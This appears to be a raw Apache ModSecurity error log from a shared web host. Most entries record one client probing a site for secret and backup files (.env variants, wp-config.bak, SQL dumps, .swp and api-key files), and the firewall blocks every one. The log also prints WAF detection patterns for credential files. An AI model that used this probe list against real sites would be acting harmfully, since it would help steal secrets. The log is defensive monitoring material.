[Tue May 26 19:51:25.528918 2026] [security2:error] [pid 86490:tid 86597] [remote 49.12.3.147:58492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWsZVZMwN0DpLVWo6KWqgAAxmo"]
[Tue May 26 19:51:25.808152 2026] [security2:error] [pid 86490:tid 86676] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/Datavase/.env"] [unique_id "ahWsZVZMwN0DpLVWo6KWtgAAAL0"]
[Tue May 26 19:51:26.412746 2026] [autoindex:error] [pid 86490:tid 86666] [client 209.38.233.139:38824] AH01276: Cannot serve directory /home1/vcress4h/vcresco-usa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:51:26.663367 2026] [security2:error] [pid 86490:tid 86664] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/secrets/login.bak"] [unique_id "ahWsZlZMwN0DpLVWo6KWzgAAALE"]
[Tue May 26 19:51:26.832048 2026] [security2:error] [pid 86490:tid 86662] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/actions-server/.env"] [unique_id "ahWsZlZMwN0DpLVWo6KW1QAAAK8"]
[Tue May 26 19:51:27.342168 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/resource/.env"] [unique_id "ahWsZ1ZMwN0DpLVWo6KW6QAAANg"]
[Tue May 26 19:51:27.502234 2026] [security2:error] [pid 86490:tid 86741] [client 102.164.188.174:4734] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWsZ1ZMwN0DpLVWo6KW6AAA_gU"], referer: https://erp.azurmediatec.com/salaries/card.php?action=create&fk_project=0&accountid=1&paymenttype=2&datepday=18&datepmonth=3&datepyear=2026
[Tue May 26 19:51:27.850962 2026] [security2:error] [pid 86490:tid 86733] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/clients/.env"] [unique_id "ahWsZ1ZMwN0DpLVWo6KW9gAAAPY"]
[Tue May 26 19:51:28.482306 2026] [security2:error] [pid 86490:tid 86734] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsaFZMwN0DpLVWo6KXAAAAAPc"]
[Tue May 26 19:51:29.043061 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/access-key/.env"] [unique_id "ahWsaVZMwN0DpLVWo6KXJgAAAP0"]
[Tue May 26 19:51:29.382611 2026] [security2:error] [pid 86490:tid 86660] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/resources/views/errors/.env"] [unique_id "ahWsaVZMwN0DpLVWo6KXLgAAAK0"]
[Tue May 26 19:51:30.064247 2026] [security2:error] [pid 86490:tid 86636] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/php-app/frontend/.env"] [unique_id "ahWsalZMwN0DpLVWo6KXPgAAAJU"]
[Tue May 26 19:51:30.234107 2026] [security2:error] [pid 86490:tid 86646] [client 185.177.72.53:61304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/settings.py.swp"] [unique_id "ahWsalZMwN0DpLVWo6KXQgAAAJ8"]
[Tue May 26 19:51:31.164390 2026] [security2:error] [pid 86490:tid 86746] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsalZMwN0DpLVWo6KXWwAAAQM"]
[Tue May 26 19:51:31.567443 2026] [security2:error] [pid 86490:tid 86711] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/chat-app/api/.env"] [unique_id "ahWsa1ZMwN0DpLVWo6KXdAAAAOA"]
[Tue May 26 19:51:31.891366 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/crm-app/src/.env"] [unique_id "ahWsa1ZMwN0DpLVWo6KXfgAAANg"]
[Tue May 26 19:51:32.540952 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/admin/public/wp-config.bak"] [unique_id "ahWsbFZMwN0DpLVWo6KXlgAAANY"]
[Tue May 26 19:51:33.070486 2026] [security2:error] [pid 86490:tid 86640] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsbFZMwN0DpLVWo6KXmQAAAJk"]
[Tue May 26 19:51:33.839994 2026] [security2:error] [pid 86490:tid 86722] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/food-app/src/.env"] [unique_id "ahWsbVZMwN0DpLVWo6KX0AAAAOs"]
[Tue May 26 19:51:34.653263 2026] [security2:error] [pid 86490:tid 86669] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/dump.sql.lz4.bak"] [unique_id "ahWsblZMwN0DpLVWo6KX7QAAALY"]
[Tue May 26 19:51:34.813468 2026] [security2:error] [pid 86490:tid 86685] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/handlers/.env"] [unique_id "ahWsblZMwN0DpLVWo6KX8AAAAMY"]
[Tue May 26 19:51:35.300365 2026] [security2:error] [pid 86490:tid 86629] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/backups/data.sql"] [unique_id "ahWsb1ZMwN0DpLVWo6KX_AAAAI4"]
[Tue May 26 19:51:35.460872 2026] [security2:error] [pid 86490:tid 86671] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cloud/.env"] [unique_id "ahWsb1ZMwN0DpLVWo6KYAwAAALg"]
[Tue May 26 19:51:35.689298 2026] [security2:error] [pid 86490:tid 86725] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsb1ZMwN0DpLVWo6KX-wAAAO4"]
[Tue May 26 19:51:36.109906 2026] [security2:error] [pid 86490:tid 86632] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/roles/.env"] [unique_id "ahWscFZMwN0DpLVWo6KYHAAAAJE"]
[Tue May 26 19:51:36.432879 2026] [security2:error] [pid 86490:tid 86727] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/system/.env.old"] [unique_id "ahWscFZMwN0DpLVWo6KYJQAAAPA"]
[Tue May 26 19:51:36.593921 2026] [security2:error] [pid 86490:tid 86659] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/shop-app/server/.env"] [unique_id "ahWscFZMwN0DpLVWo6KYKAAAAKw"]
[Tue May 26 19:51:37.242649 2026] [security2:error] [pid 86490:tid 86642] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api-key.swp"] [unique_id "ahWscVZMwN0DpLVWo6KYQQAAAJs"]
[Tue May 26 19:51:37.728090 2026] [security2:error] [pid 86490:tid 86658] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/core/.env"] [unique_id "ahWscVZMwN0DpLVWo6KYUAAAAKs"]
[Tue May 26 19:51:38.213941 2026] [security2:error] [pid 86490:tid 86701] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/ClientApp/.env"] [unique_id "ahWsclZMwN0DpLVWo6KYYgAAANY"]
[Tue May 26 19:51:38.375425 2026] [security2:error] [pid 86490:tid 86692] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/keys/database.bak"] [unique_id "ahWsclZMwN0DpLVWo6KYYwAAAM0"]
[Tue May 26 19:51:38.861731 2026] [security2:error] [pid 86490:tid 86697] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/firebase.php.bak"] [unique_id "ahWsclZMwN0DpLVWo6KYgAAAANI"]
[Tue May 26 19:51:39.048210 2026] [security2:error] [pid 86490:tid 86679] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsclZMwN0DpLVWo6KYcQAAAMA"]
[Tue May 26 19:51:39.184543 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/app/.env"] [unique_id "ahWsc1ZMwN0DpLVWo6KYiAAAAMg"]
[Tue May 26 19:51:40.321170 2026] [security2:error] [pid 86490:tid 86719] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/pOrTaL/.eNv"] [unique_id "ahWsdFZMwN0DpLVWo6KYsAAAAOg"]
[Tue May 26 19:51:40.481326 2026] [security2:error] [pid 86490:tid 86740] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/cp/.env"] [unique_id "ahWsdFZMwN0DpLVWo6KYtQAAAP0"]
[Tue May 26 19:51:40.548394 2026] [security2:error] [pid 86490:tid 86568] [remote 119.18.52.246:45078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWsdFZMwN0DpLVWo6KYsQAAu00"]
[Tue May 26 19:51:40.641955 2026] [security2:error] [pid 86490:tid 86691] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/src/__tests__/__fixtures__/instanceWithDependentSteps/.env"] [unique_id "ahWsdFZMwN0DpLVWo6KYuAAAAMw"]
[Tue May 26 19:51:41.290041 2026] [security2:error] [pid 86490:tid 86703] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.development.old"] [unique_id "ahWsdVZMwN0DpLVWo6KY1QAAANg"]
[Tue May 26 19:51:41.613522 2026] [security2:error] [pid 86490:tid 86693] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/django-app/api/.env"] [unique_id "ahWsdVZMwN0DpLVWo6KY2gAAAM4"]
[Tue May 26 19:51:41.645884 2026] [security2:error] [pid 86490:tid 86742] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsdVZMwN0DpLVWo6KY1AAAAP8"]
[Tue May 26 19:51:41.657908 2026] [security2:error] [pid 86490:tid 86676] [client 185.170.104.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWsdVZMwN0DpLVWo6KY2QAAAL0"], referer: http://www.anujtradingco.com/
[Tue May 26 19:51:41.774831 2026] [security2:error] [pid 86490:tid 86660] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/svelte-app/backend/.env"] [unique_id "ahWsdVZMwN0DpLVWo6KY4QAAAK0"]
[Tue May 26 19:51:42.102454 2026] [security2:error] [pid 86490:tid 86674] [client 185.177.72.53:40844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/env/main.bak"] [unique_id "ahWsdlZMwN0DpLVWo6KY7AAAALs"]
[Tue May 26 19:51:42.120409 2026] [security2:error] [pid 86490:tid 86745] [client 175.136.188.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsdVZMwN0DpLVWo6KY4AAAAQI"]
